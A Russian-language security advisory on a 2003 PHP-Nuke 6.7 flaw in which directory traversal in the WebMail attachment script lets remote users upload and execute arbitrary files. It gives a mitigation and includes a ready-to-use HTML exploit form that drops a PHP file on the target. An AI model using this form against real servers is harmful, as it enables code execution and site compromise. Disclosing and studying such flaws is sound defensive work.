Загрузка и выполнение произвольных файлов на системе в PHP-Nuke

Дата публикации:
07.10.2003
Всего просмотров:
1827
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PHP-Nuke 6.7

Описание: Уязвимость обнаружена в PHP-Nuke на Windows системах. Удаленный пользователь может загрузить и затем выполнить произвольные файлы на системе.

Недостаток обнаружен в сценарии 'modules/WebMail/mailattach.php'. Удаленный пользователь может загрузить на сервер файлы с произвольным именем. Удаленный пользователь может определить имя файла, содержащее символы обхода каталога для '$userfile_name' переменной, чтобы загрузить файл в произвольное местоположение на системе.

Пример/Эксплоит:

<form 
action="http://[target]/modules/WebMail/mailattach.php?userfile_name=../../AvantGo/language/bad.
php" 
method="POST" ENCTYPE="multipart/form-data">
<input type="hidden" name="attachments" value="1">
<input type="file" name="userfile"><br>
<input type="submit" name="Send File>
</form>

URL производителя: http:/www.phpnuke.org/

Решение: Запретите доступ Web пользователю на запись на уровне файловой системы.

Ссылки: PHP-Nuke v 6.7 + Windows = File Upload

или введите имя

CAPTCHA